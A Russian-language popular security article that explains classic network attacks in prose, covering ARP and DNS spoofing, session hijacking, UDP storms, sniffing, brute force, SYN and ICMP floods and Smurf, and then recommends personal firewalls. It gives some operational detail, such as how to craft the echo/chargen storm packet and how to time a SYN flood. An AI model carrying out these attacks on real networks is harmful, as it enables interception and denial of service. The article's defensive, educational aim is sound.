Есть такая вещь Dummy ARP server. В сети Internet каждый пользователь имеет уникальный IP адрес, на который поступают все сообщения из глобальной сети. Однако протокол IP это не столько сетевой, сколько межсетевой протокол обмена, предназначенный для связи между объектами в глобальной сети. На канальном уровне пакеты адресуются по аппаратным адресам сетевых карт. В сети Internet для взаимно однозначного соответствия IP и Ethernet адресов используется Address Resolution Protocol. Первоначально хост может не иметь информации о Ethernet — адресах других пользователей, находящихся с ним в одном сегменте, в том числе и о Ethernet — адресе маршрутизатора. Соответственно, при первом обращении к сетевым ресурсам хост отправляет широковещательный ARP-запрос, который получат все станции в данном сегменте сети. Получив данный запрос, маршрутизатор отправляет на запросивший хост ARP-ответ, в котором сообщает свой Ethernet-адрес. Данная схема работы позволяет злоумышленнику послать ложный ARP-ответ, в котором объявить себя искомым хостом, (например, маршрутизатором), и, в дальнейшем, активно контролировать весь сетевой трафик «обманутого» хоста. Проще говоря получать все ваши данные. Но это ещё не всё, что может приключиться с нами, пока мы спим.
Dummy DNS. Внедрение в сеть Internet ложного DNS-сервера путем перехвата DNS-запроса. Для реализации атаки злоумышленнику необходимо перехватить DNS-запрос, извлечь из него номер UDP-порта отправителя запроса, двухбайтовое значение ID идентификатора DNS-запроса и искомое имя и, затем, послать ложный DNS-ответ на извлеченный из DNS-запроса UDP-порт, в котором указать в качестве искомого IP-адреса настоящий IP-адрес ложного DNS-сервера. Это позволит в дальнейшем полностью перехватить и активно воздействовать на информацию, циркулирующую между «обманутым» хостом и сервером. Необходимым условием осуществления данного варианта атаки является перехват DNS-запроса. Это возможно только в том случае, если атакующий находится либо на пути основного трафика, либо в сегменте настоящего DNS-сервера. Выполнение одного из этих условий местонахождения хакера в сети делает подобную удаленную атаку трудно осуществимой на практике (попасть в сегмент DNS-сервера и тем более в межсегментный канал связи атакующему скорее всего не удастся). Однако в случае выполнения этих условий возможно осуществить межсегментную удаленную атаку на сеть Internet, что вообще-то нежелательно.
IP Hijacking. Необходимым условием является доступ к машине, находящейся на пути сетевого потока. Напомним, что при передаче данных постоянно используются оба поля находящиеся в IP-заголовке. Исходя из их значения, сервер и клиент проверяют корректность передачи пакетов. Существует возможность ввести соединение в «десинхронизированное состояние». Это когда присылаемые сервером данные не будут совпадать с ожидаемым значениями клиента, и наоборот. В данном случае злоумышленник, «прослушивая» линию, может взять на себя функции посредника, генерируя корректные пакеты для клиента и сервера и перехватывая их ответы. Метод позволяет полностью обойти такие системы защиты, как, например, одноразовые пароли, поскольку злоумышленник начинает работу уже после того, как произойдет авторизация пользователя. UDP storm. Как правило, по умолчанию системы поддерживают работу таких UDP-портов, как 7 («эхо», полученный пакет отсылается назад), 19 («знакогенератор», в ответ на полученный пакет отправителю высылается строка знакогенератора) и других. В данном случае хакер может послать единственный UDP-пакет, где в качестве исходного порта будет указан 7, в качестве получателя — 19-й, а в качестве адреса получателя и отправителя будут указаны, к примеру, две машины вашей сети (или даже 127.0.0.1). Получив пакет, 19-й порт отвечает строкой, которая попадает на порт 7. Седьмой порт дублирует ее и вновь отсылает на 19 и так до бесконечности. Бесконечный цикл съедает ресурсы машин и добавляет на канал бессмысленную нагрузку. Конечно, при первом потерянном UDP-пакете буря прекратиться. Traffic analysis (sniffing) Прослушивание канала. Практически все сетевые карты поддерживают возможность перехвата пакетов, передаваемых по общему каналу локальной сети. При этом рабочая станция может принимать пакеты, адресованные другим компьютерам того же сегмента сети. Таким образом, весь информационный обмен в сегменте сети становится доступным хакеру, что поможет в дальнейшем ему подобрать/придумать другие типы атак против Вас. Для успешной реализации этой атаки компьютер злоумышленника должен располагаться в том же сегменте локальной сети, что и атакуемый компьютер. Атака Brute Force «Грубая сила», используется хакерами в тех случаях, когда доступ к системе либо информации закрыт паролем, а уязвимостей не удалось обнаружить. Осуществляется простым перебором всех возможных либо наиболее часто встречающихся паролей. Во втором случае brute force достаточно часто называют «атакой по словарю». Fuzzy. Пакет IP содержит поле, определяющее какой протокол следующего уровня(TCP, UDP, ICMP) использует данные из Internet. Хакеры могут использовать нестандартное значение данного поля для передачи данных, которые не будут фиксироваться стандартными средствами контроля информационных потоков.
Denial of service (DOS)
Класс атак, приводящих к отказу в обслуживании. Во время таких атак происходит повышенный расход ресурсов процессора и уменьшение канала пропускной возможности связи, что может привести к сильному замедлению работы всей компьютерной системы, отдельных задач, либо вообще к полной остановке пользователя. К DOS атакам относятся Floods, ICMP flooding, Identification flooding и другие. Изначально оговорюсь, что многое нижеописанное истинно для серверов.
1. Floods. Перевод с английского на русский — «затопление». Во время floods атак происходит посылка большого количества на атакуемую систему ICMP (чаще всего) либо UDP пакетов, которые не несут полезной информации (мусор). В результате происходит уменьшение полосы пропускания канала и загрузка компьютерной системы анализом пришедших бесполезных пакетов и генерацией на них ответов.
2. SYN flooding. Затопление SYN-пакетами — самый известный способ «забить» информационный канал. Затопление SYN пакетами основано на переполнении очереди сервера, после чего сервер перестает отвечать на запросы пользователей. В различных системах работа с очередью реализована по разному. После истечения некоторого времени (зависит от реализации) система удаляет запросы из очереди. Однако ничего не мешает хакеру послать новую порцию запросов. Таким образом, даже находясь на соединение 2400 bps, злоумышленник может посылать каждые полторы минуты по 20-30 пакетов на сервер, поддерживая его в нерабочем состоянии. Атака обычно направлена на определённую, конкретную службу, например telnet или ftp. Она заключается в передаче пакетов установления соединения на порт, соответствующий атакуемой службе. При получении запроса система выделяет ресурсы для нового соединения, после чего пытается ответить на запрос (послать «SYN-ACK») по недоступному адресу. По умолчанию NT версий 3.5-4.0 будет пытаться повторить подтверждение 5 раз — через 3, 6, 12, 24 и 48 секунд. После этого еще 96 секунд система может ожидать ответ, и только после этого освободит ресурсы, выделенные для будущего соединения. Общее время занятости ресурсов — 189 секунд.
3. ICMP flooding (flood ping). Перевод с английского на русский — «поток пингов». Во время этой атаки происходит посылка компьютерной системе жертвы большого количества запросов ICMP. В результате происходит уменьшение полосы пропускания канала и загрузка компьютерной системы анализом пришедших пакетов и генерацией на них ответов. Примечание: В мирных целях пинг используется администраторами и пользователями для проверки работоспособности основных частей транспортной системы вычислительной сети, оценить работу сети при максимальной нагрузке. При стандартном режиме работы пакеты высылаются через некоторые промежутки времени, практически не нагружая сеть.
4. DNS flooding, DNS scan. Эта атака, направленная на сервера имён Internet. Она заключается в передаче большого числа DNS запросов и приводит к тому, что у пользователей нет возможности обращаться к сервису имен и,
следовательно, обеспечивается невозможность работы обычных пользователей. DNS scan. Известно, что прежде чем начинать атаку, хакеры осуществляют выявление целей, т.е. выявление компьютеров, которые будут жертвами атаки, а также компьютеров, которые осуществляют информационный обмен с жертвами. Одним из способов выявления целей заключается в опросе сервера имён и получение от него всей имеющейся информации о домене.
5. Unreachable (dest_unreach, ICMP type 3). Эта атака заключается в том, что компьютерной системе посылается сообщение ICMP type 3, которое сообщает, что порт назначения недоступен тем самым обманывая систему и вынуждая ее разорвать соединение т.к. она будет «думать» что пакеты не доходят. ICMP туре 3 может посылаться клиентской машине, которая затем произведет отключение, либо посылаться серверу и инициатором отключения станет он. Посылку ICMP туре 3 осуществляет хакер.
6. UDP bomb. Передаваемый пакет UDP содержит неправильный формат служебных полей. Некоторые старые версии сетевого ПО приводят при получении подобного пакета к аварийному завершению системы.
7.Smurf. Атака заключается в передаче в сеть широковещательных ICMP запросов от имени компьютера-жертвы. В результате компьютеры, принявшие такие широковещательные пакеты, отвечают компьютеру-жертве, что приводит к существенному снижение пропускной способности канала связи и, в ряде случаев, к полной изоляции атакуемой сети. Атака smurf исключительно эффективна и широко распространена.
8. Pong Floods — атаки, перечисленные выше, но в качестве обратного действительного IP-адреса отправителя используется поддельный. Тем сам затрудняется обнаружение хакера.
Конечно, тяжело решить проблему безопасности в сети. Но можно попробовать. Я хочу рассказать про то, как может себя защитить обычный пользователь. Ведь по статистике именно его компьютер чаще всего становиться жертвой. Для обороны нашего с вами здоровья, давно разработаны средства «индивидуальной защиты». К ним относятся программы FIREWALL (огненная стена). FIREWALL-ы бывают разными, как для домашнего пользования (TINY PERSONAL FIREWALL, BLACK ICE), так и для корпоративного. Предприятия сами разберутся, что им делать. А вот обычный неискушённый пользователь не всегда. Хочу предложить вашему вниманию на мой взгляд самых удачных представителей «огненных стен» . Все они были мною испытаны в разное время, в разных частях интернет. Outpost Firewall (www.agnitum.com) — стал классикой пару лет назад. С тех пор не теряет своих позиций на рынке. Был создан специально для новичков, не требуя много времени на изучение своих настроек и возможностей. В то же время продвинутые пользователи нашли в программе много полезных возможностей, что позволяет создать изощренные настройки для защиты своего компьютера или сети. Уровень Outpost Firewall был высоко оценен крупнейшими отечественными изданиями, такими как «Компьютер-Пресс», «Софтерра», «Хакер», «Компьютерная Газета». Но в бочке мёда нельзя не обойтись ложкой дёгтя. В процессе работы было замечено, что компьютеры на базе процессоров AMD 450, 1600 XP под управлением системы WINDOWS 98 SE частенько после использования этой программы вешались при выключении компьютера. Конечно, я не настаиваю на все 100%, что это вызывает FIREWALL, но такие проблемы случались очень часто. И это наводит на некоторые размышления. Тем не менее это не помешало программе защитить меня пару раз в чате от NUKE атаки. Её пытались провести на компьютер. Кстати, второй эпизод знакомства с Outpost случился намного позже ещё в одном чате. На сей раз FIREWALL выдал, что был запущен ICMP фраг. В обеих случаях мой компьютер не пострадал. Это и является самой лучшей характеристикой программы. Второй продукт, который считается одним из лидеров в своей области называется Norton Personal Firewall или ещё одна его разновидность Norton Internet Security (www.symantec.com).
Norton Internet Security специально предназначена для защиты вас и вашей семьи от опасностей которые подстерегают в Internet. Основные его возможности : Закрывает доступ в Internet детям, автоматически преграждает путь вирусам и другому вредному коду. Что очень удачно подходит для борьбы со скриптовыми вирусами, описанными чуть выше. Защищает ваш компьютер как от атак из вне, так и от программ троянов, которые могут попытаться вырваться в сеть с украденной информацией.
Вообще-то программ подобного рода очень и очень много. И для описания хотя бы десятка их потребовалась не одна журнальная страница. Именно по этому в окончании публикации я хочу привести отрывок одного текста (переведённого с английского), который был написан для программы Black Ice (FIREWALL) ещё в 1999 году.
«Большинство хакеров являются неопытными детьми желающими пошутить. Они просто хотят порисоваться перед своими друзьями, что они могут взломать систему. К несчастью, даже неопытный взломщик может вызвать серьезный ущерб войдя в вашу сеть. Корпорации давно узнали о рисках для их бизнеса вызванного хакерами. Тем не менее, большинство министерств внутренних дел и пользователей — не подозревают, что хакеры могут сделать. Они могут сделать ваш компьютерный полностью непригодным к работе. Хакеры могут украсть или удалить важные данные. Находчивый взломщик может вызвать огромный финансовый ущерб, компаниям которые каждый, используют Internet. В 1997 комиссия Сената США, Роберта S. Litt, Deputy (ассистента Министра Юстиции) установила. Компьютерные преступление обходятся от $500 миллионов до $10 миллиардов долларов за год. Институт компьютерной безопасности опросил 428 специалистов информационной безопасности в компаниях. 42% респондентов указало, что происходило несанкционированное использование их компьютерных систем в течение прошлого года. И всё из-за отсутствия централизованного управления или недостаточного финансирования.» Напомню ещё раз, что такая ситуация была в 1997 году. С тех пор многое изменилось. Но одна вещь осталось незыблемой. На безопасности экономить нельзя!

При создании публикации были использованы материалы с сайта
http://kiev-security.org.ua

Роман Карпач

Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38